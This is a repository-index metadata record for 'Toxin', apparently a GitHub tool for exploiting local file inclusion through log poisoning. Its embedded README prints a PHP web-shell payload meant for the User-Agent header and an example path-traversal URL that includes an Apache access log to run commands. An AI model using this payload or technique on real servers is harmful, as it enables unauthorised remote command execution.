{"id":29882782,"url":"https://github.com/boxingoctopuscreative/toxin","last_synced_at":"2025-07-31T12:44:14.380Z","repository":{"id":55373360,"uuid":"145468575","full_name":"BoxingOctopusCreative/toxin","owner":"BoxingOctopusCreative","description":"LFI (Local File Inclusion) Exploitation Tool","archived":false,"fork":false,"pushed_at":"2021-01-04T20:25:37.000Z","size":14,"stargazers_count":16,"open_issues_count":0,"forks_count":6,"subscribers_count":4,"default_branch":"main","last_synced_at":"2023-10-20T00:57:50.615Z","etag":null,"topics":["click","lfi-exploitation","local-file-inclusion","python","requests","security-tools"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BoxingOctopusCreative.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-08-20T20:43:18.000Z","updated_at":"2023-10-20T00:57:50.615Z","dependencies_parsed_at":"2022-08-14T22:50:20.040Z","dependency_job_id":null,"html_url":"https://github.com/BoxingOctopusCreative/toxin","commit_stats":null,"previous_names":["boxingoctopus/toxin"],"tags_count":null,"template":null,"template_full_name":null,"purl":"pkg:github/BoxingOctopusCreative/toxin","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BoxingOctopusCreative%2Ftoxin","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BoxingOctopusCreative%2Ftoxin/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BoxingOctopusCreative%2Ftoxin/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BoxingOctopusCreative%2Ftoxin/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BoxingOctopusCreative","download_url":"https://codeload.github.com/BoxingOctopusCreative/toxin/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BoxingOctopusCreative%2Ftoxin/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":268040344,"owners_count":24185847,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-31T02:00:08.723Z","response_time":66,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["click","lfi-exploitation","local-file-inclusion","python","requests","security-tools"],"created_at":"2025-07-31T12:44:13.394Z","updated_at":"2025-07-31T12:44:14.296Z","avatar_url":"https://github.com/BoxingOctopusCreative.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Toxin\n\nToxin is an LFI (Local File Inclusion)/Log Pollution Exploitation Tool.\n\n## Introduction\n\nToxin exploits a particular (and yet also common)type of \nLocal File Inclusion (LFI) vulnerability wherein the attacker\nis able to take advantage of PHP's `register_globals` setting. \n\nIn this attack scenario, the attacker would craft a custom \n`User-Agent` header which would contain arbitrary PHP code\nthat would register a new global variable to the environment\nlike so:\n\n```php\n\u003c?php system($_GET['cmd']); ?\u003e\n```\n\nWith the new, malicious global variable registered, we can add it \nto a query string within a URL containing a file on the target host\nwhich is vulnerable to inclusion, and then use the file along with\nthe query string to execute arbitrary system-level commands, like so:\n\n`http://target.tld/info.php?page=../../../../../var/log/apache/access.log\u0026cmd=whoami`\n\nThere are a number of common files which typically fall prey to this attack, \nToxin does not attempt to fuzz for those files, but instead expects you, \nthe attacker, to have prior knowledge of your target.\n\n## Installation\n\n`$ python setup.py install`\n\n## Usage\n\n```bash\n  ______           _\n /_  __/___  _  __(_)___\n  / / / __ \\| |/_/ / __ \\\n / / / /_/ /\u003e  \u003c/ / / / /\n/_/  \\____/_/|_/_/_/ /_/\n\n\nUsage: toxin [OPTIONS]\n\n  Toxin: Local File Inclusion Exploitation Tool\n\nOptions:\n  -u, --url TEXT        URL to query\n  -p, --parameter TEXT  Parameter to inject into User-Agent header\n                        (Default: 'cmd')\n  -c, --command TEXT    Command to Run\n  -m, --mode TEXT       Mode (Inject or Exploit)\n  -g, --paged           Paged Output\n  --version             Show the version and exit.\n  --help                Show this message and exit.\n  -h                    Show this message and exit.\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fboxingoctopuscreative%2Ftoxin","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fboxingoctopuscreative%2Ftoxin","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fboxingoctopuscreative%2Ftoxin/lists"}